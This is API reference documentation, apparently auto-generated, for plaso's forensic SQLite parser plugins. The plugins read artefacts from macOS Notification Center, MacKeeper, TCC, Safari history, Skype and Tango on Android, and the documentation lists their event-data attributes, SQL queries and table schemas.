Record: contains historical records Requests: contain pending requests Delivered: delivered requestsDisplayed: displayed requests, by app_id Snoozed: snoozed by user requests

DATA_FORMAT = 'MacOS Notification Center SQLite database file'

NAME = 'mac_notificationcenter'

ParseNotificationcenterRow(parser_mediator, query, row, **unused_kwargs)Parses a message row.

Parameters




QUERIES = [('SELECT a.identifier AS bundle_name, r.data AS dataBlob, r.delivered_date AS timestamp,r.presented AS presented FROM app a, record r WHERE a.app_id = r.app_id', 'ParseNotificationcenterRow')]

REQUIRED_STRUCTURE = {'app': frozenset({'app_id', 'identifier'}), 'record': frozenset({'app_id', 'data', 'delivered_date', 'presented'})}

SCHEMAS = [{'app': 'CREATE TABLE app (app_id INTEGER PRIMARY KEY, identifier VARCHAR)', 'dbinfo': 'CREATE TABLE dbinfo (key VARCHAR, value VARCHAR)', 'delivered': 'CREATE TABLE delivered (app_id INTEGER PRIMARY KEY, list BLOB)', 'displayed': 'CREATE TABLE displayed (app_id INTEGER PRIMARY KEY, list BLOB)', 'record': 'CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app_id INTEGER, uuid BLOB, data BLOB, request_date REAL, request_last_date REAL, delivered_date REAL, presented Bool, style INTEGER, snooze_fire_date REAL)', 'requests': 'CREATE TABLE requests (app_id INTEGER PRIMARY KEY, list BLOB)', 'snoozed': 'CREATE TABLE snoozed (app_id INTEGER PRIMARY KEY, list BLOB)'}]

plaso.parsers.sqlite_plugins.mackeeper_cache module

SQLite parser plugin for MacOS MacKeeper cache database files.

class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventDataBases: plaso.containers.events.EventData

MacKeeper Cache event data.

descriptiondescription.

Type str

event_typeevent type.

Type str

record_idrecord identifier.



Type int

roomroom.

Type str

texttext.

Type str

urlURL.

Type str

user_nameuser name.

Type str

user_siduser security identifier (SID).

Type str

DATA_TYPE = 'mackeeper:cache'

class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS MacKeeper cache database files.

DATA_FORMAT = 'MacOS MacKeeper cache SQLite database file'

NAME = 'mackeeper_cache'

ParseReceiverData(parser_mediator, query, row, **unused_kwargs)Parses a single row from the receiver and cache response table.

Parameters




QUERIES = [('SELECT d.entry_ID AS id, d.receiver_data AS data, r.request_key, r.time_stamp AS time_string FROM cfurl_cache_receiver_data d, cfurl_cache_response r WHERE r.entry_ID = d.entry_ID', 'ParseReceiverData')]

REQUIRED_STRUCTURE = {'cfurl_cache_blob_data': frozenset({}), 'cfurl_cache_receiver_data': frozenset({'entry_ID', 'receiver_data'}), 'cfurl_cache_response': frozenset({'entry_ID', 'request_key', 'time_stamp'})}

SCHEMAS = [{'cfurl_cache_blob_data': 'CREATE TABLE cfurl_cache_blob_data(entry_ID INTEGER PRIMARY KEY, response_object BLOB, request_object BLOB, proto_props BLOB, user_info BLOB)', 'cfurl_cache_receiver_data': 'CREATE TABLE cfurl_cache_receiver_data(entry_ID INTEGER PRIMARY KEY, receiver_data BLOB)', 'cfurl_cache_response': 'CREATE TABLE cfurl_cache_response(entry_ID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, version INTEGER, hash_value INTEGER, storage_policy INTEGER, request_key TEXT UNIQUE, time_stamp NOT NULL DEFAULT CURRENT_TIMESTAMP, partition TEXT)', 'cfurl_cache_schema_version': 'CREATE TABLE cfurl_cache_schema_version(schema_version INTEGER)'}]



plaso.parsers.sqlite_plugins.macos_tcc module

SQLite parser plugin for MacOS TCC database files.

class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryBases: plaso.containers.events.EventData

macOS TCC event data.

allowedwhether access to the service was allowed.

Type bool

clientname of the client requesting access to the service.

Type str

prompt_countnumber of times an appplication prompted the user for access to a service.

Type int

servicename of the service.

Type str

DATA_TYPE = 'macos:tcc_entry'

class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS TCC database files.

The MacOS Transaprency, Consent, Control (TCC) database file is typically stored in: /Library/ApplicationSupport/com.apple.TCC/TCC.db /Users/<username>/Library/Application Support/com.apple.TCC/TCC.db

DATA_FORMAT = 'MacOS Transaprency, Consent, Control (TCC) SQLite database (TCC.db) file'

NAME = 'macostcc'

ParseTCCEntry(parser_mediator, query, row, **unused_kwargs)Parses an application usage row.

Parameters




QUERIES = [("SELECT service, client, allowed, prompt_count, last_modified, DATETIME(last_modified, 'UNIXEPOCH', 'LOCALTIME') AS timestamp FROM access;", 'ParseTCCEntry')]

REQUIRED_STRUCTURE = {'access': frozenset({'access', 'access_overrides', 'active_policy', 'admin', 'expired', 'policies'})}

SCHEMAS = [{'access': 'CREATE TABLE IF NOT EXISTS "access" (\n service TEXT NOT NULL,\n client TEXT NOT NULL,\n client_type INTEGER NOT NULL,\n allowed INTEGER NOT NULL,\n prompt_count INTEGER NOT NULL,\n csreq BLOB,\n policy_id INTEGER,\n indirect_object_identifier_type INTEGER,\n indirect_object_identifier TEXT DEFAULT \'UNUSED\',\n indirect_object_code_identity BLOB,\n flags INTEGER,\n last_modified INTEGER NOT NULL\n DEFAULT (CAST(strftime(\'%s\',\'now\') AS INTEGER)),\n PRIMARY KEY\n (service, client, client_type, indirect_object_identifier),\n FOREIGN KEY (policy_id)\n REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE);'}]



plaso.parsers.sqlite_plugins.safari module

SQLite parser plugin for Safari history database files.

class plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventDataBases: plaso.containers.events.EventData

Safari history event data.

hosthostname of the server.

Type str


Type str

urlURL visited.

Type str

visit_countnumber of times the website was visited.

Type int

was_http_non_getTrue if the webpage was visited using a non-GET HTTP request.

Type bool

DATA_TYPE = 'safari:history:visit_sqlite'

class plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqliteBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Safari history database files.

The Safari history database file is typically stored in: History.db

DATA_FORMAT = 'Safari history SQLite database (History.db) file'

NAME = 'safari_historydb'

ParsePageVisitRow(parser_mediator, query, row, **unused_kwargs)Parses a visited row.

Parameters




QUERIES = [('SELECT history_items.id, history_items.url, history_items.visit_count, history_visits.id AS visit_id, history_visits.history_item,history_visits.visit_time, history_visits.redirect_destination, history_visits.title, history_visits.http_non_get, history_visits.redirect_source FROM history_items, history_visits WHERE history_items.id = history_visits.history_item ORDER BY history_visits.visit_time', 'ParsePageVisitRow')]

REQUIRED_STRUCTURE = {'history_items': frozenset({'id', 'url', 'visit_count'}), 'history_visits': frozenset({'history_item', 'http_non_get', 'id', 'redirect_destination', 'redirect_source', 'title', 'visit_time'})}

SCHEMAS = [{'history_client_versions': 'CREATE TABLE history_client_versions (client_version INTEGER PRIMARY KEY,last_seen REAL NOT NULL)', 'history_event_listeners': 'CREATE TABLE history_event_listeners (listener_name TEXT PRIMARY KEY NOT NULL UNIQUE,last_seen REAL NOT NULL)', 'history_events': 'CREATE TABLE history_events (id INTEGER PRIMARY KEY AUTOINCREMENT,event_type TEXT NOT NULL,event_time REAL NOT NULL,pending_listeners TEXT NOT NULL,value BLOB)', 'history_items': 'CREATE TABLE history_items (id INTEGER PRIMARY KEY AUTOINCREMENT,url TEXT NOT NULL UNIQUE,domain_expansion TEXT NULL,visit_count INTEGER NOT NULL,daily_visit_counts BLOB NOT NULL,weekly_visit_counts BLOB NULL,autocomplete_triggers BLOB NULL,should_recompute_derived_visit_counts INTEGER NOT NULL,visit_count_score INTEGER NOT NULL)', 'history_tombstones': 'CREATE TABLE history_tombstones (id INTEGER PRIMARY KEY AUTOINCREMENT,start_time REAL NOT NULL,end_time REAL NOT NULL,url TEXT,generation INTEGER NOT NULL DEFAULT 0)', 'history_visits': 'CREATE TABLE history_visits (id INTEGER PRIMARY KEY AUTOINCREMENT,history_item INTEGER NOT NULL REFERENCES history_items(id) ON DELETE CASCADE,visit_time REAL NOT NULL,title TEXT NULL,load_successful BOOLEAN NOT NULL DEFAULT 1,http_non_get BOOLEAN NOT NULL DEFAULT 0,synthesized BOOLEAN NOT NULL DEFAULT 0,redirect_source INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,redirect_destination INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,origin INTEGER NOT NULL DEFAULT 0,generation INTEGER NOT NULL DEFAULT 0,attributes INTEGER NOT NULL DEFAULT 0,score INTEGER NOT NULL DEFAULT 0)', 'metadata': 'CREATE TABLE metadata (key TEXT NOT NULL UNIQUE, value)'}]



plaso.parsers.sqlite_plugins.skype module

SQLite parser plugin for Skype database files.

class plaso.parsers.sqlite_plugins.skype.SkypeAccountEventDataBases: plaso.containers.events.EventData

Skype account event data.

countryhome country of the account holder.

Type str

display_namedisplay name of the account holder.

Type str

emailregistered email address of the account holder.

Type str

usernamefull name of the Skype account holder and display name.

Type str

DATA_TYPE = 'skype:event:account'

class plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataBases: plaso.containers.events.EventData

Skype call event data.

call_typecall type, such as: WAITING, STARTED, FINISHED.

Type str

dst_callaccount which received the call.

Type str

src_callaccount which started the call.

Type str

user_start_callTrue if the owner account started the call.

Type bool

video_conferenceTrue if the call was a video conference.

Type bool

DATA_TYPE = 'skype:event:call'

class plaso.parsers.sqlite_plugins.skype.SkypeChatEventDataBases: plaso.containers.events.EventData

Skype chat event data.



from_accountfrom display name and the author.

Type str

textbody XML.

Type str

titletitle.

Type str

to_accountaccounts, excluding the author, of the conversation.

Type str

DATA_TYPE = 'skype:event:chat'

class plaso.parsers.sqlite_plugins.skype.SkypePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Skype database files.

DATA_FORMAT = 'Skype SQLite database (main.db) file'

NAME = 'skype'

ParseAccountInformation(parser_mediator, query, row, **unused_kwargs)Parses account information.

Parameters



• row (sqlite3.Row) – row with account information.

ParseCall(parser_mediator, query, row, **unused_kwargs)Parses a call.

Parameters


• query (Optional[str]) – query that created the row.


• query – query.

ParseChat(parser_mediator, query, row, **unused_kwargs)Parses a chat message.

Parameters






ParseFileTransfer(parser_mediator, query, row, cache=None, database=None, **un-used_kwargs)

Parses a file transfer.

There is no direct relationship between who sends the file and who accepts the file.

Parameters






ParseSMS(parser_mediator, query, row, **unused_kwargs)Parses an SMS.

Parameters




QUERIES = [('SELECT c.id, c.participants, c.friendlyname AS title, m.author AS author, m.from_dispname AS from_displayname, m.body_xml, m.timestamp, c.dialog_partner FROM Chats c, Messages m WHERE c.name = m.chatname', 'ParseChat'), ('SELECT id, fullname, given_displayname, emails, country, profile_timestamp, authreq_timestamp, lastonline_timestamp, mood_timestamp, sent_authrequest_time, lastused_timestamp FROM Accounts', 'ParseAccountInformation'), ('SELECT id, target_numbers AS dstnum_sms, timestamp AS time_sms, body AS msg_sms FROM SMSes', 'ParseSMS'), ('SELECT id, partner_handle, partner_dispname, offer_send_list, starttime, accepttime, finishtime, filepath, filename, filesize, status, parent_id, pk_id FROM Transfers', 'ParseFileTransfer'), ('SELECT c.id, cm.guid, c.is_incoming, cm.call_db_id, cm.videostatus, c.begin_timestamp AS try_call, cm.start_timestamp AS accept_call, cm.call_duration FROM Calls c, CallMembers cm WHERE c.id = cm.call_db_id;', 'ParseCall')]

QUERY_DEST_FROM_TRANSFER = 'SELECT parent_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'

QUERY_SOURCE_FROM_TRANSFER = 'SELECT pk_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'

REQUIRED_STRUCTURE = {'Accounts': frozenset({'authreq_timestamp', 'country', 'emails', 'fullname', 'given_displayname', 'id', 'lastonline_timestamp', 'mood_timestamp', 'profile_timestamp', 'sent_authrequest_time'}), 'CallMembers': frozenset({'call_db_id', 'call_duration', 'guid', 'start_timestamp', 'videostatus'}), 'Calls': frozenset({'begin_timestamp', 'id', 'is_incoming'}), 'Chats': frozenset({'dialog_partner', 'friendlyname', 'id', 'name', 'participants'}), 'Messages': frozenset({'author', 'body_xml', 'chatname', 'from_dispname', 'timestamp'}), 'SMSes': frozenset({'body', 'id', 'target_numbers', 'timestamp'}), 'Transfers': frozenset({'accepttime', 'filename', 'filepath', 'filesize', 'finishtime', 'id', 'offer_send_list', 'parent_id', 'partner_dispname', 'partner_handle', 'pk_id', 'starttime', 'status'})}

SCHEMAS = [{'Accounts': 'CREATE TABLE Accounts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, pwdchangestatus INTEGER, logoutreason INTEGER, commitstatus INTEGER, suggested_skypename TEXT, skypeout_balance_currency TEXT, skypeout_balance INTEGER, skypeout_precision INTEGER, skypein_numbers TEXT, subscriptions TEXT, cblsyncstatus INTEGER, offline_callforward TEXT, chat_policy INTEGER, skype_call_policy INTEGER, pstn_call_policy INTEGER, avatar_policy INTEGER, buddycount_policy INTEGER, timezone_policy INTEGER, webpresence_policy INTEGER, phonenumbers_policy INTEGER, voicemail_policy INTEGER, authrequest_policy INTEGER, ad_policy INTEGER, partner_optedout TEXT, service_provider_info TEXT, registration_timestamp INTEGER, nr_of_other_instances INTEGER, partner_channel_status TEXT, flamingo_xmpp_status INTEGER, federated_presence_policy INTEGER, liveid_membername TEXT, roaming_history_enabled INTEGER, cobrand_id INTEGER, owner_under_legal_age INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, homepage TEXT, about TEXT, profile_timestamp INTEGER, received_authrequest TEXT, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, aliases TEXT, authreq_timestamp INTEGER, mood_text TEXT, timezone INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, given_displayname TEXT, availability INTEGER, lastonline_timestamp INTEGER, capabilities BLOB, avatar_image BLOB, assigned_speeddial TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_comment TEXT, alertstring TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, rich_mood_text TEXT, synced_email BLOB, set_availability INTEGER, options_change_future BLOB, cbl_profile_blob BLOB, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, node_capabilities_and INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, verified_email BLOB, verified_company BLOB, uses_jcs INTEGER)', 'Alerts': 'CREATE TABLE Alerts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, timestamp INTEGER, partner_name TEXT, is_unseen INTEGER, partner_id INTEGER, partner_event TEXT, partner_history TEXT, partner_header TEXT, partner_logo TEXT, meta_expiry INTEGER, message_header_caption TEXT, message_header_title TEXT, message_header_subject TEXT, message_header_cancel TEXT, message_header_later TEXT, message_content TEXT, message_footer TEXT, message_button_caption TEXT, message_button_uri TEXT, message_type INTEGER, window_size INTEGER, chatmsg_guid BLOB, notification_id INTEGER, event_flags INTEGER, extprop_hide_from_history INTEGER)', 'AppSchemaVersion': 'CREATE TABLE AppSchemaVersion (ClientVersion TEXT NOT NULL, SQLiteSchemaVersion INTEGER NOT NULL, SchemaUpdateType INTEGER NOT NULL)', 'CallMembers': 'CREATE TABLE CallMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, dispname TEXT, languages TEXT, call_duration INTEGER, price_per_minute INTEGER, price_precision INTEGER, price_currency TEXT, payment_category TEXT, type INTEGER, status INTEGER, failurereason INTEGER, sounderror_code INTEGER, soundlevel INTEGER, pstn_statustext TEXT, pstn_feedback TEXT, forward_targets TEXT, forwarded_by TEXT, debuginfo TEXT, videostatus INTEGER, target_identity TEXT, mike_status INTEGER, is_read_only INTEGER, quality_status INTEGER, call_name TEXT, transfer_status INTEGER, transfer_active INTEGER, transferred_by TEXT, transferred_to TEXT, guid TEXT, next_redial_time INTEGER, nrof_redials_done INTEGER, nrof_redials_left INTEGER, transfer_topic TEXT, real_identity TEXT, start_timestamp INTEGER, is_conference INTEGER, quality_problems TEXT, identity_type INTEGER, country TEXT, creation_timestamp INTEGER, stats_xml TEXT, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, recovery_in_progress INTEGER, nonse_word TEXT, nr_of_delivered_push_notifications INTEGER, call_session_guid TEXT, version_string TEXT, pk_status INTEGER, call_db_id INTEGER, prime_status INTEGER)', 'Calls': 'CREATE TABLE Calls (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, begin_timestamp INTEGER, topic TEXT, is_muted INTEGER, is_unseen_missed INTEGER, host_identity TEXT, mike_status INTEGER, duration INTEGER, soundlevel INTEGER, access_token TEXT, active_members INTEGER, is_active INTEGER, name TEXT, video_disabled INTEGER, joined_existing INTEGER, server_identity TEXT, vaa_input_status INTEGER, is_incoming INTEGER, is_conference INTEGER, is_on_hold INTEGER, start_timestamp INTEGER, quality_problems TEXT, current_video_audience TEXT, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, is_premium_video_sponsor INTEGER, premium_video_sponsor_list TEXT, old_members BLOB, partner_handle TEXT, partner_dispname TEXT, type INTEGER, status INTEGER, failurereason INTEGER, failurecode INTEGER, pstn_number TEXT, old_duration INTEGER, conf_participants BLOB, pstn_status TEXT, members BLOB, conv_dbid INTEGER)', 'ChatMembers': 'CREATE TABLE ChatMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, chatname TEXT, identity TEXT, role INTEGER, is_active INTEGER, cur_activities INTEGER, adder TEXT)', 'Chats': 'CREATE TABLE Chats (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, name TEXT, options INTEGER, friendlyname TEXT, description TEXT, timestamp INTEGER, activity_timestamp INTEGER, dialog_partner TEXT, adder TEXT, type INTEGER, mystatus INTEGER, myrole INTEGER, posters TEXT, participants TEXT, applicants TEXT, banned_users TEXT, name_text TEXT, topic TEXT, topic_xml TEXT, guidelines TEXT, picture BLOB, alertstring TEXT, is_bookmarked INTEGER, passwordhint TEXT, unconsumed_suppressed_msg INTEGER, unconsumed_normal_msg INTEGER, unconsumed_elevated_msg INTEGER, unconsumed_msg_voice INTEGER, activemembers TEXT, state_data BLOB, lifesigns INTEGER, last_change INTEGER, first_unread_message INTEGER, pk_type INTEGER, dbpath TEXT, split_friendlyname TEXT, conv_dbid INTEGER)', 'ContactGroups': 'CREATE TABLE ContactGroups (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, custom_group_id INTEGER, given_displayname TEXT, nrofcontacts INTEGER, nrofcontacts_online INTEGER, given_sortorder INTEGER, type_old INTEGER, proposer TEXT, description TEXT, associated_chat TEXT, members TEXT, cbl_id INTEGER, cbl_blob BLOB, fixed INTEGER, keep_sharedgroup_contacts INTEGER, chats TEXT, extprop_is_hidden INTEGER, extprop_sortorder_value INTEGER, extprop_is_expanded INTEGER)', 'Contacts': 'CREATE TABLE Contacts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, aliases TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, hashed_emails TEXT, homepage TEXT, about TEXT, avatar_image BLOB, mood_text TEXT, rich_mood_text TEXT, timezone INTEGER, capabilities BLOB, profile_timestamp INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, received_authrequest TEXT, authreq_timestamp INTEGER, lastonline_timestamp INTEGER, availability INTEGER, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, given_displayname TEXT, assigned_speeddial TEXT, assigned_comment TEXT, alertstring TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_phone1 TEXT, assigned_phone1_label TEXT, assigned_phone2 TEXT, assigned_phone2_label TEXT, assigned_phone3 TEXT, assigned_phone3_label TEXT, buddystatus INTEGER, isauthorized INTEGER, popularity_ord INTEGER, external_id TEXT, external_system_id TEXT, isblocked INTEGER, authorization_certificate BLOB, certificate_send_count INTEGER, account_modification_serial_nr INTEGER, saved_directory_blob BLOB, nr_of_buddies INTEGER, server_synced INTEGER, contactlist_track INTEGER, last_used_networktime INTEGER, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, node_capabilities_and INTEGER, authreq_crc INTEGER, authreq_src INTEGER, pop_score INTEGER, authreq_nodeinfo BLOB, main_phone TEXT, unified_servants TEXT, phone_home_normalized TEXT, phone_office_normalized TEXT, phone_mobile_normalized TEXT, sent_authrequest_initmethod INTEGER, authreq_initmethod INTEGER, verified_email BLOB, verified_company BLOB, sent_authrequest_extrasbitmask INTEGER, liveid_cid TEXT, extprop_seen_birthday INTEGER, extprop_sms_target INTEGER, extprop_external_data TEXT, extprop_must_hide_avatar INTEGER)', 'Conversations': 'CREATE TABLE Conversations (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, type INTEGER, live_host TEXT, live_start_timestamp INTEGER, live_is_muted INTEGER, alert_string TEXT, is_bookmarked INTEGER, given_displayname TEXT, displayname TEXT, local_livestatus INTEGER, inbox_timestamp INTEGER, inbox_message_id INTEGER, unconsumed_suppressed_messages INTEGER, unconsumed_normal_messages INTEGER, unconsumed_elevated_messages INTEGER, unconsumed_messages_voice INTEGER, active_vm_id INTEGER, context_horizon INTEGER, consumption_horizon INTEGER, last_activity_timestamp INTEGER, active_invoice_message INTEGER, spawned_from_convo_id INTEGER, pinned_order INTEGER, creator TEXT, creation_timestamp INTEGER, my_status INTEGER, opt_joining_enabled INTEGER, opt_access_token TEXT, opt_entry_level_rank INTEGER, opt_disclose_history INTEGER, opt_history_limit_in_days INTEGER, opt_admin_only_activities INTEGER, passwordhint TEXT, meta_name TEXT, meta_topic TEXT, meta_guidelines TEXT, meta_picture BLOB, picture TEXT, is_p2p_migrated INTEGER, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, guid TEXT, dialog_partner TEXT, meta_description TEXT, premium_video_sponsor_list TEXT, mcr_caller TEXT, chat_dbid INTEGER, history_horizon INTEGER, history_sync_state TEXT, thread_version TEXT, consumption_horizon_set_at INTEGER, alt_identity TEXT, extprop_profile_height INTEGER, extprop_chat_width INTEGER, extprop_chat_left_margin INTEGER, extprop_chat_right_margin INTEGER, extprop_entry_height INTEGER, extprop_windowpos_x INTEGER, extprop_windowpos_y INTEGER, extprop_windowpos_w INTEGER, extprop_windowpos_h INTEGER, extprop_window_maximized INTEGER, extprop_window_detached INTEGER, extprop_pinned_order INTEGER, extprop_new_in_inbox INTEGER, extprop_tab_order INTEGER, extprop_video_layout INTEGER, extprop_video_chat_height INTEGER, extprop_chat_avatar INTEGER, extprop_consumption_timestamp INTEGER, extprop_form_visible INTEGER, extprop_recovery_mode INTEGER)', 'DbMeta': 'CREATE TABLE DbMeta (key TEXT NOT NULL PRIMARY KEY, value TEXT)', 'LegacyMessages': 'CREATE TABLE LegacyMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER)', 'Messages': 'CREATE TABLE Messages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, chatname TEXT, author TEXT, from_dispname TEXT, author_was_live INTEGER, guid BLOB, dialog_partner TEXT, timestamp INTEGER, type INTEGER, sending_status INTEGER, consumption_status INTEGER, edited_by TEXT, edited_timestamp INTEGER, param_key INTEGER, param_value INTEGER, body_xml TEXT, identities TEXT, reason TEXT, leavereason INTEGER, participant_count INTEGER, error_code INTEGER, chatmsg_type INTEGER, chatmsg_status INTEGER, body_is_rawxml INTEGER, oldoptions INTEGER, newoptions INTEGER, newrole INTEGER, pk_id INTEGER, crc INTEGER, remote_id INTEGER, call_guid TEXT, extprop_contact_review_date TEXT, extprop_contact_received_stamp INTEGER, extprop_contact_reviewed INTEGER)', 'Participants': 'CREATE TABLE Participants (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, identity TEXT, rank INTEGER, requested_rank INTEGER, text_status INTEGER, voice_status INTEGER, video_status INTEGER, live_identity TEXT, live_price_for_me TEXT, live_fwd_identities TEXT, live_start_timestamp INTEGER, sound_level INTEGER, debuginfo TEXT, next_redial_time INTEGER, nrof_redials_left INTEGER, last_voice_error TEXT, quality_problems TEXT, live_type INTEGER, live_country TEXT, transferred_by TEXT, transferred_to TEXT, adder TEXT, last_leavereason INTEGER, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, live_identity_to_use TEXT, livesession_recovery_in_progress INTEGER, is_multiparty_video_updatable INTEGER, real_identity TEXT, extprop_default_identity INTEGER)', 'SMSes': 'CREATE TABLE SMSes (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, outgoing_reply_type INTEGER, status INTEGER, failurereason INTEGER, is_failed_unseen INTEGER, timestamp INTEGER, price INTEGER, price_precision INTEGER, price_currency TEXT, reply_to_number TEXT, target_numbers TEXT, target_statuses BLOB, body TEXT, chatmsg_id INTEGER, identity TEXT, notification_id INTEGER, event_flags INTEGER, reply_id_number TEXT, convo_name TEXT, extprop_hide_from_history INTEGER, extprop_extended INTEGER)', 'Transfers': 'CREATE TABLE Transfers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, starttime INTEGER, finishtime INTEGER, filepath TEXT, filename TEXT, filesize TEXT, bytestransferred TEXT, bytespersecond INTEGER, chatmsg_guid BLOB, chatmsg_index INTEGER, convo_id INTEGER, pk_id INTEGER, nodeid BLOB, last_activity INTEGER, flags INTEGER, old_status INTEGER, old_filepath INTEGER, accepttime INTEGER, parent_id INTEGER, offer_send_list TEXT, extprop_localfilename TEXT, extprop_hide_from_history INTEGER, extprop_window_visible INTEGER, extprop_handled_by_chat INTEGER)', 'VideoMessages': 'CREATE TABLE VideoMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, qik_id BLOB, attached_msg_ids TEXT, sharing_id TEXT, status INTEGER, vod_status INTEGER, vod_path TEXT, local_path TEXT, public_link TEXT, progress INTEGER, title TEXT, description TEXT, author TEXT, creation_timestamp INTEGER)', 'Videos': 'CREATE TABLE Videos (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, error TEXT, debuginfo TEXT, dimensions TEXT, media_type INTEGER, duration_1080 INTEGER, duration_720 INTEGER, duration_hqv INTEGER, duration_vgad2 INTEGER, duration_ltvgad2 INTEGER, timestamp INTEGER, hq_present INTEGER, duration_ss INTEGER, ss_timestamp INTEGER, convo_id INTEGER, device_path TEXT)', 'Voicemails': 'CREATE TABLE Voicemails (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, subject TEXT, timestamp INTEGER, duration INTEGER, allowed_duration INTEGER, playback_progress INTEGER, convo_id INTEGER, chatmsg_guid BLOB, notification_id INTEGER, flags INTEGER, size INTEGER, path TEXT, failures INTEGER, vflags INTEGER, xmsg TEXT, extprop_hide_from_history INTEGER)'}]

class plaso.parsers.sqlite_plugins.skype.SkypeSMSEventDataBases: plaso.containers.events.EventData

Skype SMS event data.

numberphone number where the SMS was sent.

Type str

texttext (SMS body) that was sent.

Type str

DATA_TYPE = 'skype:event:sms'

class plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataBases: plaso.containers.events.EventData

Skype file transfer event data.

action_typeaction type such as: “GETSOLICITUDE”, “SENDSOLICITUDE”, “ACCEPTED” or “FINISHED”.

Type str



destinationaccount that received the file.

Type str

sourceaccount that sent the file.

Type str

transferred_filenamename of the file transferred.

Type str

transferred_filepathpath of the file transferred.

Type str

transferred_filesizesize of the file transferred.

Type int

DATA_TYPE = 'skype:event:transferfile'

plaso.parsers.sqlite_plugins.tango_android module

SQLite parser plugin for Tango on Android database files.

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataBases: plaso.containers.events.EventData

Tango on Android contact event data.

first_namecontact profile first name.

Type str

last_namecontact profile last name.

Type str

birthdaycontact profile birthday.

Type str

gendercontact profile gender.

Type str

statuscontact status message.

Type str

distancecontact profile distance.

Type int



is_friendTrue if the contact is considered a friend.

Type bool

friend_request_typeflag indicating the type of friend request sent for example outRequest for request sent or noRequest for norequest.

Type str

friend_request_messagemessage sent on friend request.

Type str

DATA_TYPE = 'tango:android:contact'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventDataBases: plaso.containers.events.EventData

Tango on Android conversation event data.

conversation_identifierconversation identifier.

Type int

DATA_TYPE = 'tango:android:conversation'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventDataBases: plaso.containers.events.EventData

Tango on Android message event data.

message_identifiermessage identifier.

Type int

directionflag indicating direction of the message.

Type int

DATA_TYPE = 'tango:android:message'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Tango on Android profile database files.

